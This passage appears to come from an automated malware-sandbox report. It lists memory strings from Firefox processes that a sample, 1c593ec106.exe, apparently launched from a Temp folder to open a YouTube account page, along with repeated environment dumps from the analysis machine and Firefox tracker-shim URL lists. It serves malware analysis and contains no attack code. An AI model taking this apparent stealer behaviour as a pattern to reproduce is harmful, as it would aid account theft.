data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000018.00000002.2624675381.00000238E7390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /www.youtube.com/accountMOZ_CRAx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3353317296.00000286329B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000003.2579191427.000001CBE797F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000003.2578648250.000001CBE796C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000015.00000002.2581107426.000001CBE7980000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsmmoD equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643811635.000001F414174000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2817649774.0000025C6DB07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account< equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2817649774.0000025C6DB00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Temp\1000017001\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000017.00000002.2590223303.000001DEF7FD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2625098000.00000238E7430000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000015.00000002.2580813098.000001CBE7950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/accountC:\Program Files\Mozilla Firefox\firefox.exewinsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: FileUtils_openSafeFileOutputStreamFileUtils_closeSafeFileOutputStream://www.everestjs.net/static/st.v3.js://c.amazon-adsystem.com/aax2/apstag.jswebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1://pub.doubleverify.com/signals/pub.js*://auth.9c9media.ca/auth/main.jswebcompat-reporter@mozilla.org.xpi://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svg://static.chartbeat.com/js/chartbeat.js://libs.coremetrics.com/eluminate.jsresource://gre/modules/FileUtils.sys.mjs://.imgur.com/js/vendor..bundle.js@mozilla.org/network/file-output-stream;1FileUtils_closeAtomicFileOutputStream://track.adform.net/serving/scripts/trackpoint/://static.criteo.net/js/ld/publishertag.js://web-assets.toggl.com/app/assets/scripts/.js://www.rva311.com/static/js/main..chunk.js://connect.facebook.net//sdk.jsresource://gre/modules/addons/XPIProvider.jsm://www.google-analytics.com/analytics.js://www.google-analytics.com/plugins/ua/ec.js://s0.2mdn.net/instream/html5/ima3.js://imasdk.googleapis.com/js/sdkloader/ima3.js://cdn.adsafeprotected.com/iasPET.1.js://cdn.optimizely.com/public/.js://.vidible.tv//vidible-min.js://www.googletagmanager.com/gtm.js://pagead2.googlesyndication.com/tag/js/gpt.js://static.adsafeprotected.com/iasPET.1.js://.moatads.com//moatheader.js*://js.maxmind.com/js/apis/geoip2//geoip2.js://s.webtrends.com/js/advancedLinkTracking.js://www.google-analytics.com/gtm/js*://s.webtrends.com/js/webtrends.js://s.webtrends.com/js/webtrends.min.jsTelemetrySession::onEnvironmentChange equals www.facebook.com (Facebook)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8F6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: HDAUDIO\FUNC_01&VEN_15AD&DEV_1975&SUBSYS_15AD1975&REV_1001\4&32275da5&0&0001_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORT equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625098000.00000238E745F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2625566496.00000238E7603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account' equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.2942352042.00000286233A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account+ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643663526.000001F414100000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account_ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.000002863136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: PORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=CKK equals www.youtube.com (Youtube)
Source: 1c593ec106.exe, 00000009.00000002.2967483473.0000000006699000.00000004.00000020.00020000.00000000.sdmp, 1c593ec106.exe, 0000000C.00000002.2966270641.000000000673D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3358002708.0000028632E49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2643811635.000001F414170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: aming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\bro equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3324817796.0000028631391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: detectportal.prod.mozaws.netPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOM equals www.youtube.com (Youtube)
